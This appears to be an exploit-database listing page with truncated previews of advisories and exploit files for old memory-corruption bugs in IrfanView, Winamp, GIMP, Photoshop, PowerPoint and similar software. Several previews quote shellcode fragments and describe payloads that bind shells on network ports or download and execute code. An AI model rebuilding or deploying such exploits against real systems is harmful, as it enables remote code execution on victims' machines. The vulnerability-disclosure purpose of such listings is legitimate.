ZDI-09-019: Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Vulnerability

ZDI-09-019: Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-019 May 12, 2009 -- CVE ID: CVE-2009-0556 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Office PowerPoint -- TippingPointTM IPS...

Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service

Stack overflow in vbe6.dll, used by all versions of MS Office The overflow occurs in Visual Basic for Application. Creating a property with a long name about 247 chars results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address. Probably impossib...

irfanview-corrupt.txt

/ IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu Other bugs exist... / include "stdio.h" include "stdlib.h" include "string.h" / win32exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvS...

IrfanView 4.10 - .fpx Memory Corruption

IrfanView 4.10 - .fpx Memory Corruption / IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu Other bugs exist... / include "stdio.h" include "stdlib.h" include "string.h" / win32exec - EXITFUNC=process...

IrfanView 4.10 .FPX File Memory Corruption Exploit

No description provided by source. / IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu [email protected] Other bugs exist... / include "stdio.h" include "stdlib.h" include "string.h" / win32exe...

IrfanView 4.10 .FPX File Memory Corruption Exploit

Exploit for unknown platform in category local exploits ================================================== IrfanView 4.10 .FPX File Memory Corruption Exploit ================================================== / IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested...

IrfanView 4.10 - '.fpx' Memory Corruption

/ IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu Other bugs exist... / include "stdio.h" include "stdlib.h" include "string.h" / win32exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvS...

nullsoft-overflow.txt

!/bin/perl Nullsoft Winamp MP4 tags Stack Overflow 0-day discovered and exploited by SYS 49152 Tested on win XP SP2 ENG Tuned for Nullsoft Winamp 5.32 d.i. Shell on port 49152 usage: well, not much fun for you kids here .. to get the shell you have to use ALT+3 and press UPDATE. Instead this one ...

Photoshop CS2/CS3 / Paint Shop Pro 11.20 .PNG File BoF Exploit

No description provided by source. / Photoshop CS2/CS3, Paint Shop Pro 11.20 .PNG File Buffer Overflow Like bitmap files, PNG files can do great things =D. In french: "buffer overflow a gogo!" The generated .PNG file will work for: -Photoshop CS2 -Photoshop CS3 -Photoshop Elements 5.0 -Corel Pain...

gimp2214-overflow.txt

/ :: Kristian Hermansen :: Date: 20070509 Description: Gimp 2.2.14 RAS vuln, thanks to Marsu. This one is universal download and exec using call esp in libgimpcolor-2.0-0.dll. Vulnerable: Gimp 2.2.14 Tested: Gimp 2.2.14 on Windows Vista, XP, 2000 Compile: gcc -o netsniper-gimpu netsniper-gimpu.c...

GLSA-200705-08 : GIMP: Buffer overflow

The remote host is affected by the vulnerability described in GLSA-200705-08 GIMP: Buffer overflow Marsu discovered that the 'setcolortable' function in the SUNRAS plugin is vulnerable to a stack-based buffer overflow. Impact : An attacker could entice a user to open a specially crafted .RAS file...

Adobe Photoshop CS2 / CS3 Unspecified . BMP File Buffer Overflow-vulnerability warning-the black bar safety net

Ghost boy note: with the last, like, CS3 under the test is successful, but the CS2 is not the test, I had previously been with the CS green version, too lazy to go to the next CS2 test. Source: Security vulnerabilities /\ Adobe Photoshop CS2 / CS3 Unspecified . BMP File Buffer Overflow There is a...

Winamp <= 5.34 .MP4 File Code Execution Exploit

No description provided by source. /\ Winamp = 5.34 .MP4 File Code Execution ...

abcview-overflow.txt

/ ABC-View Manager 1.42 .PSP File Buffer Overflow ABC-View Manager is vulnerable to an unspecified buffer overflow when processing a crafted .TTF file. This exploit runs calc.exe or binds shell to port 4444. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu Note: Open that in...

irfanview-overflow.txt

/ IrfanView / include "stdio.h" include "stdlib.h" / win32exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com / unsigned char CalcShellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"...

winamp-exec.txt

/\ Winamp / include "stdio.h" include "stdlib.h" / win32exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com / unsigned char CalcShellcode = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"...

gimp-overflow.txt

/\ Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Gimp uses SUNRAS plugin to process .RAS file. But this module is vulnerable to a buffer overflow in setcolortable which leads to code execution. Vulnerable code, sunras.c:862 int ncols, j; guchar ColorMap2563; ncols = sunhdr-lrasmaplength / ...

Winamp <= 5.34 .MP4 File Code Execution Exploit

Exploit for unknown platform in category local exploits =============================================== Winamp = 5.34 .MP4 File Code Execution Exploit =============================================== /\ Winamp = 5.34 .MP4 File Code Execution Winamp MP4's plugin fails to handle exceptional...

Winamp 5.34 - &#039;.mp4&#039; Code Execution

/\ Winamp = 5.34 .MP4 File Code Execution Winamp MP4's plugin fails to handle exceptional conditions, which can lead to code execution. However exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated to find a correct return address...

Winamp 5.34 - .mp4 Code Execution

Winamp 5.34 - .mp4 Code Execution /\ Winamp = 5.34 .MP4 File Code Execution Winamp MP4's plugin fails to handle exceptional conditions, which can lead to code execution. However exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated...